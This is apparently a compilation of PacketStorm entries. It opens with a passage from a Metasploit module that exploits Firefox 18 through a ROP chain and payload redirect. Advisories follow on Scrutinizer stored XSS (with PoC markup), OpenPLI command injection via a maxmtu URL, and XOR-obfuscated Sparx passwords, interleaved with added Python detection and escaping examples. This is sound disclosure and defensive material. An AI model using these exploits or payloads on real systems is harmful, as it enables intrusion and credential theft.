        # Mozilla/5.0 (Windows NT 6.1; rv:18.0) Gecko/20100101 Firefox/18.0
        nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
        firefox = agent.scan(/Firefox\/(\d+\.\d+)/).flatten[0] || ''

        case nt
        when '5.1'
          os_name = 'Windows XP SP3'
        when '6.0'
          os_name = 'Windows Vista'
        when '6.1'
          os_name = 'Windows 7'
        end

        if os_name == 'Windows 7' and firefox =~ /18/
          return targets[1]
        end

        return nil
      end

      def junk
        return rand_text_alpha(4).unpack("L")[0].to_i
      end

      def nops
        make_nops(4).unpack("N*")
      end

      # Uses rop chain from npFoxitReaderPlugin.dll (foxit) (no ASLR module)
      def win7_rop_chain

        # rop chain generated with mona.py - www.corelan.be
        rop_gadgets =
          [
            0x1000ce1a, # POP EAX # RETN [npFoxitReaderPlugin.dll]
            0x100361a8, # ptr to &VirtualAlloc() [IAT npFoxitReaderPlugin.dll]
            0x1000f055, # MOV EAX,DWORD PTR DS:[EAX] # RETN [npFoxitReaderPlugin.dll]
            0x10021081, # PUSH EAX # POP ESI # RETN 0x04 [npFoxitReaderPlugin.dll]
            0x10007971, # POP EBP # RETN [npFoxitReaderPlugin.dll]
            0x41414141, # Filler (RETN offset compensation)
            0x1000614c, # & push esp # ret [npFoxitReaderPlugin.dll]
            0x100073fa, # POP EBX # RETN [npFoxitReaderPlugin.dll]
            0x00001000, # 0x00001000-> edx
            0x1000d9ec, # XOR EDX, EDX # RETN
            0x1000d9be, # ADD EDX,EBX # POP EBX # RETN 0x10 [npFoxitReaderPlugin.dll]
            junk,
            0x100074a7, # POP ECX # RETN [npFoxitReaderPlugin.dll]
            junk,
            junk,
            junk,
            0x41414141, # Filler (RETN offset compensation)
            0x00000040, # 0x00000040-> ecx
            0x1000e4ab, # POP EBX # RETN [npFoxitReaderPlugin.dll]
            0x00000001, # 0x00000001-> ebx
            0x1000dc86, # POP EDI # RETN [npFoxitReaderPlugin.dll]
            0x1000eb81, # RETN (ROP NOP) [npFoxitReaderPlugin.dll]
            0x1000c57d, # POP EAX # RETN [npFoxitReaderPlugin.dll]
            nops,
            0x10005638, # PUSHAD # RETN [npFoxitReaderPlugin.dll]
          ].flatten.pack("V*")

        return rop_gadgets
      end

      def on_request_uri(cli, request)

        agent = request.headers['User-Agent']
        my_target = get_target(agent)

        # Avoid the attack if no suitable target found
        if my_target.nil?
          print_error("Browser not supported, sending 404: #{agent}")
          send_not_found(cli)
          return
        end

        unless self.respond_to?(my_target[:rop])
          print_error("Invalid target specified: no callback function defined")
          send_not_found(cli)
          return
        end

        return if ((p = regenerate_payload(cli)) == nil)

        # we use two responses:
        # one for an HTTP 301 redirect and sending the payload
        # and one for sending the HTTP 200 OK with appropriate Content-Type
    if request.resource =~ /\.pdf$/
    # sending Content-Type
    resp = create_response(200, "OK")
    resp.body = ""
    resp['Content-Type'] = 'application/pdf'
    resp['Content-Length'] = rand_text_numeric(3,"0")
    cli.send_response(resp)
    return
    else
    resp = create_response(301, "Moved Permanently")
    resp.body = ""

    my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
    if datastore['SSL']
    schema = "https"
    else
    schema = "http"
    end

    sploit = rand_text_alpha(my_target['Offset'] - "#{schema}://#{my_host}:#{datastore['SRVPORT']}#{request.uri}.pdf?".length)
    sploit << [my_target.ret].pack("V") # EIP
    sploit << [my_target['WritableAddress']].pack("V") # Writable Address
    sploit << self.send(my_target[:rop])
    sploit << p.encoded

    resp['Location'] = request.uri + '.pdf?' + Rex::Text.uri_encode(sploit, 'hex-all')
    cli.send_response(resp)

    # handle the payload
    handler(cli)
    end
    end

    end

    Source: PacketStorm
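The module above delivers its overflow through an HTTP 301 whose Location header appends ".pdf?" plus a fully percent-encoded binary blob to the requested URI. As an added defensive example (not part of the Metasploit module or the PacketStorm post), the following Python scans captured HTTP responses for redirects of that shape. The thresholds, the response format and the sample records are assumptions constructed for this demo.

```python
"""Flag HTTP redirects whose Location header ends a .pdf path with a long,
almost entirely percent-encoded query that decodes to binary data.

Added example (not the module's own code). Thresholds and the captured
responses below are constructed for illustration.
"""
import re
from urllib.parse import unquote_to_bytes

# Assumed thresholds: real links are rarely this long or this densely encoded.
MIN_DECODED_LEN = 256
MIN_ENCODED_RATIO = 0.9

LOCATION_RE = re.compile(r"^Location:\s*(\S+)", re.IGNORECASE | re.MULTILINE)
PCT_RE = re.compile(r"%[0-9A-Fa-f]{2}")


def analyze_location(location):
    """Return a verdict dict for one Location header value."""
    path, sep, query = location.partition("?")
    if not sep or not path.lower().endswith(".pdf"):
        return {"suspicious": False, "reason": "not a .pdf? redirect"}
    if not query:
        return {"suspicious": False, "reason": "empty query"}
    decoded = unquote_to_bytes(query)
    # Share of the query made up of %XX triplets (1.0 means every byte encoded).
    ratio = len(PCT_RE.findall(query)) * 3 / len(query)
    non_printable = sum(1 for b in decoded if b < 0x20 or b > 0x7E)
    suspicious = (len(decoded) >= MIN_DECODED_LEN
                  and ratio >= MIN_ENCODED_RATIO
                  and non_printable > 0)
    return {
        "suspicious": suspicious,
        "decoded_len": len(decoded),
        "encoded_ratio": round(ratio, 2),
        "non_printable": non_printable,
        "reason": ("long, fully percent-encoded binary query" if suspicious
                   else "looks like an ordinary link"),
    }


def scan_responses(raw_responses):
    """Return verdicts for every 301/302 response whose Location looks hostile."""
    hits = []
    for idx, resp in enumerate(raw_responses):
        status_line = resp.splitlines()[0] if resp else ""
        if " 301 " not in status_line and " 302 " not in status_line:
            continue
        match = LOCATION_RE.search(resp)
        if not match:
            continue
        verdict = analyze_location(match.group(1))
        if verdict["suspicious"]:
            verdict["response_index"] = idx
            hits.append(verdict)
    return hits


# Constructed sample: 272 filler bytes followed by 64 bytes of binary data,
# hex-encoded byte by byte the way a "hex-all" URI encoder would emit them.
SUSPICIOUS_QUERY = "".join("%%%02x" % b for b in b"A" * 272 + bytes(range(64)))

SAMPLE_RESPONSES = [
    "HTTP/1.1 301 Moved Permanently\r\nLocation: /docs/manual.pdf?version=2\r\n"
    "Content-Length: 0\r\n\r\n",
    "HTTP/1.1 301 Moved Permanently\r\nLocation: /x.pdf?" + SUSPICIOUS_QUERY +
    "\r\nContent-Length: 0\r\n\r\n",
    "HTTP/1.1 200 OK\r\nContent-Type: application/pdf\r\nContent-Length: 123\r\n\r\n",
]

if __name__ == "__main__":
    for hit in scan_responses(SAMPLE_RESPONSES):
        print(hit)
```

Only the second constructed response is flagged: it is a .pdf redirect whose query is entirely percent-encoded, decodes to well over 256 bytes and contains non-printable bytes. An ordinary PDF link with a short readable query passes, as does the 200 response that only sets Content-Type.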

  19. Sonicwall OEM Scrutinizer version 9.5.2 suffers from multiple persistent script insertion vulnerabilities that can allow for cross site scripting.

    Title:
    ======
    Sonicwall OEM Scrutinizer v9.5.2 - Multiple Web Vulnerabilities


    Date:
    =====
    2013-02-14


    References:
    ===========
    http://www.vulnerability-lab.com/get_content.php?id=786


    VL-ID:
    =====
    786


    Common Vulnerability Scoring System:
    ====================================
    5.2


    Introduction:
    =============
    Dell™ SonicWALL™ Scrutinizer is a multi-vendor, flow-based application traffic analytics, visualization and reporting tool
    to measure and troubleshoot network performance and utilization while increasing productivity for enterprises and service providers.
    Scrutinizer supports a wide range of routers, switches, firewalls, and data-flow reporting protocols, providing unparalleled insight
    into application traffic analysis from IPFIX/NetFlow data exported by Dell SonicWALL firewalls, as well as support for a wide range
    of routers, switches, firewalls, and data-flow reporting protocols. IT administrators in charge of high throughput networks can
    deploy Scrutinizer as a virtual appliance for high performance environments.

    (Copy of the Vendor Homepage: http://www.sonicwall.com/us/en/products/Scrutinizer.html )


    Abstract:
    =========
    The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the Dell Sonicwall OEM Scrutinizer v9.5.2 appliance application.


    Report-Timeline:
    ================
    2012-12-05: Researcher Notification & Coordination
    2012-12-07: Vendor Notification
    2013-01-08: Vendor Response/Feedback
    2013-02-10: Vendor Fix/Patch
    2013-02-11: Public or Non-Public Disclosure


    Status:
    ========
    Published


    Affected Products:
    ==================
    DELL
    Product: Sonicwall OEM Scrutinizer 9.5.2


    Exploitation-Technique:
    =======================
    Remote


    Severity:
    =========
    High


    Details:
    ========
    Multiple persistent input validation vulnerabilities are detected in the Sonicwall OEM Scrutinizer v9.5.2 appliance application.
The bugs allow remote attackers to implement/inject malicious script code on the application side (persistent).

    The first persistent vulnerability is located in the Alarm - New Board & Policy Manager module with the bound vulnerable
    Search item - BBSearchText parameter request. The vulnerability allows to inject persistent script code as search item value.
    The result is the persistent execution of script code out of the BBSearchText listing.

The second persistent vulnerability is located in the Dashboard - Flow Expert module with the bound vulnerable Mytab parameter.
    The vulnerability allows to inject persistent script code as myTab link value. The result is the persistent execution of script
    code out of the Mytab link listing.

    The 3rd persistent vulnerability is located in the MyView (CGI) module with the bound vulnerable `newName` parameter request.
    The vulnerability allows to inject persistent script code as newName. The result is the persistent execution of script code
    out of the core value listing.

    The 4th persistent vulnerability is located in the Admin > Admin [New Users & New Group] module with the bound vulnerable
    groupName & username parameters. The vulnerability allows to inject persistent script code as username or groupname. The result
    is the persistent execution of script code out of all username and group listings + checkboxes.

    The 5th persistent vulnerability is located in the Admin > Admin [Mapping / Maps (CGI) - Dashboard Status] module with the bound
    vulnerable groupMembers, Type, Checkbox Linklike, indexColumn, name, Object Name & settings groups(checkbox) parameters.
    The vulnerability allows to inject persistent script code as groupMembers, Type, Checkbox Linklike, indexColumn, name, Object Name
    & settings groups(checkbox) value(s). The result is the persistent execution of script code out of the groupMembers, Type, Checkbox
    Linklike, indexColumn, name, Object Name listings and settings groups checkbox.

    The 6th persistent vulnerability is located in the Alarms > Overview Bulletin Board > Advanced Filters module with the bound vulnerable
    displayBBAdvFilterModal() - (Policy Name, Board Name, Violators) parameters. The vulnerability allows to inject persistent script code
    as Policy Name, Board Name and Violator. The result is the persistent execution of script code out of the Policy Name, Board Name and
    Violator listings.

    Successful exploitation of the vulnerability can lead to persistent session hijacking (manager/admin), persistent phishing, persistent
    external redirects to malware or scam and persistent web context manipulation in the affected vulnerable module(s). Exploitation requires
    low user interaction & a low privileged appliance web application user account.

    Vulnerable Section(s):
    [+] Alarm
    [+] Dashboard
    [+] MyView (CGI)
    [+] Admin > Admin
    [+] Admin > Admin
    [+] Alarms

    Vulnerable Module(s):
    [+] New Board & Policy Manager
    [+] Flow Expert
    [+] Value
    [+] New Users & New Group
    [+] Mapping / Maps (CGI) - Dashboard Status
    [+] Overview Bulletin Board > Advanced Filters

    Vulnerable Parameter(s):
    [+] Search item - BBSearchText
    [+] Mytab
    [+] newName
    [+] groupName & username - Place in Usergroup - Listing
    [+] groupMembers, Type, Checkbox Linklike, indexColumn, name, Object Name & settings groups(checkbox)
    [+] displayBBAdvFilterModal() - (Policy Name, Board Name, Violators)


    Proof of Concept:
    =================
    The persistent input validation web vulnerabilities can be exploited by remote attackers with low privileged application user account
    and low required user interaction. For demonstration or reproduce ...


    Review: Alarm > New Board & Policy Manager - [BBSearchText] Search item

    <td class="textRight agNoWrap">
    <input id="BBSearchText" title="Search item" value="<<[PERSISTENT INJECTED SCRIPT CODE!];)" <="""=""></iframe>
    <input class="button" id="BBSearchButton" value="Search" title="Search" onclick="bbSearch(this)" type="button">

    <input class="button" onclick="displayBBAdvFilterModal()" title="Search using multiple criteria" value="Advanced Filters" type="button">




    Review: Dashboard > Flow Expert > Mytab - [Mytab Name]

    <div><span class="myv_tab"><span tid="1" style="margin-left: 10px; margin-right: 10px;">Flow Expert</span></span>
    <span class="myv_tab"><span tid="2" style="margin-left: 10px; margin-right: 10px;">Configure Flow Analytics</span></span>
    <span class="myv_tab"><span tid="3" style="margin-left: 10px; margin-right: 10px;">CrossCheck</span></span><span class="myv_tab">
    <span tid="4" style="margin-left: 10px; margin-right: 10px;">Example</span></span><span class="myv_tab"><span tid="5" style="margin-left:
    10px; margin-right: 10px;">Cisco PfR</span></span><span class="myv_tab"><span tid="6" style="margin-left: 10px; margin-right:
    10px;">Training</span></span><span class="myv_selectedtab"><span title="Click to rename" class="jedit" id="tab_7"
    origname="My New Tab"><[PERSISTENT INJECTED SCRIPT CODE!]">%20%20%20%20"><[PERSISTENT INJECTED SCRIPT CODE!]") <</iframe></span>
    <img style="margin-left: 6px; cursor: pointer;" src="Scrutinizer%20%29%20Dashboard-Dateien/tab-edit.gif"></span><span class="add_tab">
    <span style="margin-left: 6px; cursor: pointer;">Add a tab</span></span></div>



    Review: MyView (CGI) > Value - [newName]

    <html><head>
    <meta http-equiv="content-type" content="text/html; charset=UTF-8"></head>
    <body>{"newName":"<[PERSISTENT INJECTED SCRIPT CODE!]"> \"><[PERSISTENT INJECTED SCRIPT CODE!]") <"}</iframe></body>
    </html>


    Review: Admin > Admin > New Users & New Group - [groupname, up_availGroups & username - Place in Usergroup - Listing]

    <div class="unfortunate" style="" id="settingsContent">

    <div id="settingsHeader"></div>

    <div id="settingsOutput">



    <title>User Preferences</title>
    <div id="mainFrame">


    <div style="height: 552px;" id="upMenu"><div class="basic ui-accordion selected" style="float:left;" id="upTreeMenu">
    <a class="selected"> New User</a><div style="height: 511px; display: block; overflow: hidden;" class="genericAccordionContainer">
    <p style="padding-left: 10px;" id="new_user_panel"><label>Username: <input class="newform" id="new_username"
    type="text"></label><label>Password <input class="newform" id="new_password" type="password"><img id="pw_strength" src="/images/common/strength_0.gif"></label><label>Confirm Password: <input class="newform" id="cnf_password" type="password">
    </label><label style="margin-top: 5px; margin-bottom: 8px;" id="up_availGroupsLbl">Place in User Group <select style="display: block;"
    id="up_availGroups"><option value="3"><iframe src="a"> "><[PERSISTENT INJECTED SCRIPT CODE!]") <</iframe></option>
<option value="1">Administrators</option><option value="2">Guests</option></select></label><input value="Create User" class="button"
    style="margin-top: 3px;" type="button"></p></div><a class=""> Users</a><div style="height: 511px; display: none; overflow: hidden;"
    class="genericAccordionContainer"><p id="users_p"><span class="menuLink">admin</span></p></div></div></div>


    Review: Admin > Admin > Mapping/Maps (CGI) - Dashboard Status - [groupMembers, Type, Checkbox Linklike, indexColumn,name,ObjectName & settings groups]

    <div class="fmapsScroll" id="groupScroll"><table class="dataTable filterable" id="grpTable"><tbody id="grpTbody"><tr id="grpTblHdr">
    <th width="20"><input id="checkAllObj" name="checkAllObj" title="Permanently delete groups" type="checkbox"></th><th style="width: 100%;"
    class="alignLeft">Group Name</th><th width="40">Type</th><th width="40">Membership</th><th width="40">Map Status</th></tr><tr id="grp_tr1">
    <td><input title="Permanently delete this object from ALL groups" name="1" type="checkbox"></td><td class="alignLeft"><a title="Click here to edit
    this group" href="#NA" class="linkLike"><iframe src="a">%20%20%20%20[PERSISTENT INJECTED SCRIPT CODE!]"><ifra...</iframe></a>
    </td><td>Google</td><td><a title="Click to change object
    membership for this group" class="linkLike">Membership</a></td><td><select id="pass_1" class="passSel"><option value="0">No Pass</option>
    <option value="1">Pass Up</option></select></td>
    <td style="display: none;" class="indexColumn">%20%20%20%20[PERSISTENT INJECTED SCRIPT CODE!]"><ifra...googlemembershipno
    passpass up</td></tr></tbody></table></div><input style="margin-top: 10px; margin-left: 8px;" id="delObjectBtn" value="Delete" class="button"
    type="button"><div id="editGrpDiv"><div id="obj_typeForm"><div id="iconPreview"><img src="/images/maps/group16.png" id="previewImage"></div>
    <div id="toGroupMsg"></div><select style="margin-left: 30px; margin-bottom: 5px; width: 159px;" id="obj_iconSelect" name="icon"><option
    value="gicon16.png">gicon16.png</option><option value="gicon24.png">gicon24.png</option><option value="gicon32.png">gicon32.png</option>
    <option value="gicon48.png">gicon48.png</option><option value="gicon72.png">gicon72.png</option><option value="group16.png">group16.png</option>
    <option value="group24.png">group24.png</option><option value="group32.png">group32.png</option><option value="group48.png">group48.png</option>
    <option value="group72.png">group72.png</option></select></div><table id="editGroupTable" class="dataTable"><tbody><tr id="grpTypeRow">
    <td class="alignLeft cellHeader">Type</td><td class="alignLeft"><select id="edit_grpType"><option value="flash">Flash</option>

    ...

<table class="dataTable" id="fmaps_mapTabList" width="100%"><thead><tr><th style="white-space: nowrap;" nowrap="">Map</th>
    <th style="white-space: nowrap;" nowrap="">Type</th><th style="white-space: nowrap;" nowrap="">Background</th></tr></thead><tbody>
    <tr><td class="" style="white-space: nowrap; padding-right: 5px;" align="left" nowrap=""><a href="#NA"><iframe src="a">%20%20%20%20">
    <iframe src=a onload=alert("VL") <</iframe></a></td><td class="" style="white-space: nowrap;" align="left" nowrap="" width="100%">Google</td>
<td class="" align="center">-</td></tr></tbody></table>

    ...

    <tbody id="objTbody"><tr id="objTblHdr"><th width="20"><input id="checkAllObj" name="checkAllObj" type="checkbox"></th><th width="20">
</th><th style="width: 100%;" tf_colkey="objName" class="alignLeft">Object Name</th><th style="text-align: center;" align="center" nowrap="">
    Type</th><th width="20">Membership</th></tr><tr id="obj_tr1"><td class="fmaps_bakTrHi highlightRow"> </td><td class="fmaps_bakTrHi
    highlightRow"><img class="listIcon" src="/images/maps/gicon24.png"></td><td class="alignLeft fmaps_bakTrHi highlightRow"><a title="Click to edit
    this object" href="#NA"><iframe src="a">%20%20%20%20"><iframe src=...</iframe></a></td><td class="fmaps_bakTrHi highlightRow" nowrap="">
    <span style="cursor:default;">Group</span></td><td class="fmaps_bakTrHi highlightRow"><a title="Click to change group membership for this object"
class="linkLike">Membership</a></td><td style="display: none;" class="indexColumn fmaps_bakTrHi
    highlightRow"> %20%20%20%20"><iframe src=...groupmembership</td></tr></tbody>

    ...

    <td style="padding-right: 1px; padding-bottom: 1px; padding-left: 1px;" id="fmaps_confBody" valign="top"><div style="height: 19px;"
id="fmaps_containerTitle" class="titleBar"><span style="float:left" ;="">Settings</span><img title="Map Settings Help"
    src="/images/common/help.png"><select id="fmaps_groupSelect">
    <option class="google" value="1"><iframe src="a">%20%20%20%20"><iframe src=a onload=alert("VL") < (google)
</iframe></option></select></div><div id="fmaps_confBodyContainer"><div id="defaultsContainer">


    ...

<li class="expandable noWrapOver " groupid="g1"> <div class="hitarea expandable-hitarea "> </div> <img src="/images/common/gicon.png"
gid="1" title="<iframe src=a>%20%20%20%20"><iframe src="a" onload="alert("VL")" <="" (group="" id:="" 1)"=""></iframe>
    <span id="sdfTreeLoadG" class="" title="<iframe src=a>%20%20%20%20"><iframe src=a onload=alert("VL") < (Group ID: 1)"
    gid="1"><iframe src="a">%20%20%20...</span>

    <ul style="display: none;">

    <li>Loading...</li>
    </ul>
    </li>
    <li class='expandable noWrapOver lastExpandable'>
    <div class='hitarea expandable-hitarea lastExpandable-hitarea'> </div> <img src='/images/common/TreeUngroupGray.png'/><span class="">Ungrouped</span>
    <ul style="display: none;">
    <li class="last"><span class=" ">No Devices</span></li>
    </ul>
    </li>
    </ul>
    </iframe></span></li>


    Solution:
    =========
    2013-02-10: Vendor Fix/Patch

    Where changing code paths to use bound variables was not practical in such a short timeframe, we pass inputs included in a query through a function that escapes potentially dangerous characters.


    Risk:
    =====
The security risk of the persistent input validation web vulnerabilities is estimated as medium(+)|(-)high.


    Credits:
    ========
    Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com)


    Disclaimer:
    ===========
    The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties,
    either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
    Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
    profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
    states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
    may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
    or trade with fraud/stolen material.

    Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register
    Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com
    Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com
    Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
    Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php

    Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
    Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
    media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and
    other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
    modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission.

    Copyright © 2012 | Vulnerability Laboratory




    --
    VULNERABILITY RESEARCH LABORATORY
    LABORATORY RESEARCH TEAM
    CONTACT: research@vulnerability-lab.com

    Source: PacketStorm
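Every finding in the advisory above is the same defect: a stored value (search item, tab name, user or group name) is written back into an HTML attribute or into a JSON body inside the page without encoding for that context. As an added example (not code from the advisory or from the Scrutinizer product), the Python below shows a naive rendering beside a context-aware one for the two contexts the advisory's HTML excerpts exhibit, plus an allow-list check for the name fields. The templates and the marker payload are constructed for this demo.

```python
"""Context-aware output encoding versus naive string concatenation.

Added example, not Scrutinizer code. The templates mimic the shape of the
advisory's HTML excerpts; the payload is a constructed, inert marker.
"""
import html
import json
import re

# Attribute context: the stored search item is echoed into value="...".
SEARCH_ITEM_TEMPLATE = '<input id="BBSearchText" title="Search item" value="{value}">'

# Counts tag openers so a test can tell whether a payload created a new element.
TAG_RE = re.compile(r"<\s*/?\s*[a-zA-Z]")

# Allow-list for identifiers such as username / groupName (assumed policy).
NAME_RE = re.compile(r"[A-Za-z0-9_.\-]{1,64}")


def render_search_item_unsafe(value):
    """Vulnerable: raw interpolation lets a quote close the attribute."""
    return SEARCH_ITEM_TEMPLATE.format(value=value)


def render_search_item_safe(value):
    """Hardened: HTML-escape with quote=True so '"' and '<' cannot break out."""
    return SEARCH_ITEM_TEMPLATE.format(value=html.escape(value, quote=True))


def render_json_body_unsafe(new_name):
    """Vulnerable: mirrors the advisory's {"newName":"..."} body built by hand."""
    return '<body>{"newName":"%s"}</body>' % new_name


def render_json_body_safe(new_name):
    """Hardened: serialize with json.dumps, then escape the three characters
    that could otherwise open or close HTML tags when the JSON sits in a page.
    The result is still valid JSON for the client."""
    payload = json.dumps({"newName": new_name})
    payload = (payload.replace("<", "\\u003c")
                      .replace(">", "\\u003e")
                      .replace("&", "\\u0026"))
    return "<body>%s</body>" % payload


def is_safe_name(name):
    """Reject user/group names outside a conservative identifier alphabet."""
    return NAME_RE.fullmatch(name) is not None


def injected_tag_count(rendered, expected_tags):
    """Number of tag openers beyond what the template itself contains."""
    return len(TAG_RE.findall(rendered)) - expected_tags


# Constructed marker payload: closes the attribute, then opens a new element.
MARKER = '"><iframe src="x">'

if __name__ == "__main__":
    print(render_search_item_unsafe(MARKER))
    print(render_search_item_safe(MARKER))
    print(render_json_body_unsafe(MARKER))
    print(render_json_body_safe(MARKER))
```

With the marker, the unsafe renderers each add one extra element to the page; the safe ones add none, and the encoded JSON still round-trips to the original string through json.loads, so the fix does not change what the client receives.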

  20. OpenPLI Dream Multimedia Box suffers from cross site scripting and remote OS command injection vulnerabilities.

    Device Name: OpenPLI - Dream Multimedia Box with OpenPLI software
    Vendor of device: Dream Multimedia
    Vendor of Software: OpenPLI Community

    ============ Device Details: ============

    Linux Kernel Linux version 2.6.9 (build@plibouwserver) (gcc version 3.4.4) #1 Wed Aug 17 23:54:07 CEST 2011
    Firmware release 1.1.0, 27.01.2013
    FP Firmware 1.06
    Web Interface 6.0.4-Expert - PLi edition by [lite]

    More infos: http://openpli.org/

    ============ Vulnerability Overview: ============

    * OS Command Execution:

    parameter: maxmtu

    The vulnerability is caused by missing input validation in the maxmtu parameter and can be exploited to inject and execute arbitrary shell commands. It is possible to use Netcat to fully compromise the device.

    http://Target-IP/cgi-bin/setConfigSettings?maxmtu=%26COMMAND%26&hddstandby=2&hddacoustics=160&timeroffsetstart=0&timeroffsetstop=0&audiochannelspriority=&showsatpos=on&trustedhosts=&epgcachepath=%2Fhdd&epgsqlpath=%2Fvar%2Flib%2Fsqlite

    It is possible to shorten the URL to the following:

    http://Target-IP/cgi-bin/setConfigSettings?maxmtu=%26COMMAND%26

There is Netcat preinstalled on the device. It is a very small edition of netcat, so you have to play a bit with it, but you will get it.

    * stored XSS:

    Box Control -> Configuration -> Webserver -> User, Password

    parameter: AuthUser, AuthPassword

    Box Control -> Configuration -> Settings

    parameter: audiochannelspriority

    Injecting scripts into the parameter audiochannelspriority reveals that this parameter is not properly validated for malicious input.

    ============ Solution ============

    No known solution available.

    ============ Credits ============

    The vulnerability was discovered by Michael Messner
    Mail: devnull#at#s3cur1ty#dot#de
    Web: http://www.s3cur1ty.de/advisories
    Twitter: @s3cur1ty_de

    Source: PacketStorm
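The command injection above exists because a setting that can only ever be a number (maxmtu) is handed to a shell unvalidated. As an added example (not code from the OpenPLI project or the advisory), the Python below does two things a defender would want: it validates maxmtu as a bounded integer before it reaches any system call, and it scans web-server access logs for requests to the setConfigSettings CGI whose parameters carry shell metacharacters. The MTU range, the log format and the sample log lines are constructed assumptions.

```python
"""Strict validation of a numeric CGI parameter, and a log check for the
injection pattern from the advisory.

Added example, not OpenPLI code. The MTU bounds and the access-log lines
below are constructed for illustration.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Assumed acceptable MTU range for this example.
MTU_MIN, MTU_MAX = 576, 9000

# Characters that never belong in a numeric setting; their presence in a
# value that is later handed to a shell is the defect the advisory describes.
SHELL_META_RE = re.compile(r"[;&|`$<>\n]")

# Apache/nginx style request line inside a common-log-format record.
REQ_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def validate_maxmtu(raw):
    """Return the MTU as int if raw is a plain 3-5 digit decimal in range, else None.

    fullmatch on digits only means no sign, no whitespace, no metacharacters
    can survive; range checking then rejects nonsense like 99999.
    """
    if raw is None or re.fullmatch(r"\d{3,5}", raw) is None:
        return None
    value = int(raw)
    return value if MTU_MIN <= value <= MTU_MAX else None


def check_request(url):
    """Inspect one request URL; return findings for the setConfigSettings CGI."""
    parts = urlsplit(url)
    findings = []
    if parts.path.endswith("/cgi-bin/setConfigSettings"):
        # parse_qs percent-decodes, so %26 inside a value shows up as '&'.
        params = parse_qs(parts.query, keep_blank_values=True)
        for name, values in params.items():
            for value in values:
                if SHELL_META_RE.search(value):
                    findings.append("%s: shell metacharacter in value" % name)
        mtu_raw = params.get("maxmtu", [None])[0]
        if mtu_raw is not None and validate_maxmtu(mtu_raw) is None:
            findings.append("maxmtu: not a valid MTU")
    return {"url": url, "findings": findings, "block": bool(findings)}


def scan_access_log(lines):
    """Return the verdicts of all requests that should have been rejected."""
    hits = []
    for line in lines:
        match = REQ_RE.search(line)
        if not match:
            continue
        verdict = check_request(match.group(1))
        if verdict["block"]:
            hits.append(verdict)
    return hits


# Constructed access-log sample (RFC 5737 documentation addresses).
SAMPLE_LOG = [
    '192.0.2.10 - - [14/Feb/2013:10:00:01 +0100] '
    '"GET /cgi-bin/setConfigSettings?maxmtu=1500&hddstandby=2 HTTP/1.1" 200 512',
    '192.0.2.10 - - [14/Feb/2013:10:00:02 +0100] '
    '"GET /cgi-bin/setConfigSettings?maxmtu=%26COMMAND%26 HTTP/1.1" 200 512',
    '192.0.2.11 - - [14/Feb/2013:10:00:03 +0100] "GET /index.html HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit)
```

The second constructed record is the shape shown in the advisory: after percent-decoding, the maxmtu value contains '&', so it both fails the numeric check and trips the metacharacter rule. A normal settings change with maxmtu=1500 produces no finding.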

  21. Sparx Systems Enterprise Architect version 9.3.931 stores user passwords in the database simply XORed with the ASCII code of 'E17030402158' instead of using a generally accepted hash function.

    Subject
    =======
    Simple password obfuscation in Sparx Systems "Enterprise Architect" when using server based repositories

    Affected product
    ================
    Product: Enterprise Architect
    Vendor: Sparx Systems

    Affected versions
    =================
    Tested with 9.3.931 Corporate, other versions likely to be affected too.

    Description
    ===========
    When using server based repositories in Enterprise Architect the user account information is stored in the database table t_secuser. The column "Password" contains the user password in an obfuscated format. The content is simply the user password XOR'ed with the ASCII code of 'E17030402158' instead of using a generally accepted hash function. Hence everyone with access to the database (which is in general every user with access to the repository) is able to decode the passwords of all other users.

    Impact
    ======
    Disclosure of user passwords.

    Possible mitigating factors
    ===========================
    Beginning with version 7.1 Enterprise Architect offers a feature where project owners can provide users with a shortcut to the project that contains the database connection string in an encrypted format. This should avoid the need to reveal database access credentials to end users.

    Conclusion
    ==========
Everyone with access to the database containing the repository is able to decode the passwords of all users. Irrespective of the fact that ordinary end users may be detained from gaining access to the database using the "Encrypt Connection String" feature, at least SQL admins may still read the t_secuser table and are therefore able to decode the passwords.

    Chronology
    ==========
    Vendor informed: 2012/01/28
    Vendor reminded: 2012/02/06
Vendor response: 2012/02/07

    Summary of vendor response:
    - "We are aware of these limitations"
    - "No fixes are scheduled at this time."

    Released to public: 2012/02/12

    Reported by
    ===========
    Holm Diening
    Dept. Privacy and Information Security

    E-Mail: holm.diening@gematik.de
    www.gematik.de

    gematik
    Gesellschaft für Telematikanwendungen der Gesundheitskarte mbH Friedrichstraße 136
    10117 Berlin
    Amtsgericht Berlin-Charlottenburg HRB 96351 B
Managing Director: Prof. Dr. Arno Elmer

    Source: PacketStorm
